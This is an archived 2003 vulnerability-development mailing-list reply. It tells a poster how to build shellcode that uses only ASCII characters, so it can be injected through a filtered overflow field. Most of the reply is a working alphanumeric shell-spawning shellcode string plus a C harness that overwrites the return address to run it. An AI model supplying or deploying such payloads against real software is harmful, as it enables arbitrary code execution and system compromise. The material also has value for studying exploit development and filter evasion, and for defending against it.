Vulnerability Development mailing list archives

Re: shellcode with standard characters


From: steve () uk intasys com
Date: Thu, 12 Jun 2003 23:48:29 +0100

On Thu, Jun 12, 2003 at 11:20:00AM +0200, JohnnyRun wrote:

> This is my first post and I'm looking for some documentation.
> A friend of mine has produced a segfault with a malloc vulnerability on an
> application.
>
> We would like to produce something more interesting.
> The field overflowed can accept only characters between 0 and 128. Any
> other character is replaced with a whitespace.
>
> Can we inject shellcode with only these characters available?
> Can you suggest documentation about shellcode writing?

  The simplest thing to do is to write a simple program in C that will run
 a shell, and generate the assembly output for it with GCC -s;
 this will give you a starting point.

  After that you must filter out the opcodes and values which contain
 invalid characters.  Using adds, etc. will save you some effort.

  Here's a simple sample:

  char shellcode[] =
    "DDDDTYTX3H01H01h03h0LLLLLLLLXPY3E01E01u03u0j0fXh8eshXf5VJPfhbi"
    "fhDefXf5AJfPDTYhKATYX5KATYPQTUX3H01H01X03X0YRX3E01E03U0Jfh2GfX"
    "f3E0f1E0f1U0fh88fX0E1f1E0f3E0fPTRX49HHHQfPfYRX2E00E0BRX0E02E02"
    "L0z0L0zYRX4j4aGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
    "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
    "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG"
    "GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG";

  int main()
  {
     int *ret;
     ret = (int *)&ret + 2;
     (*ret) = (int)shellcode;

     return 0;
  }

Steve
-- 
Steve Kemp <steve () uk intasys com>
Intasys Billing Technologies Ltd

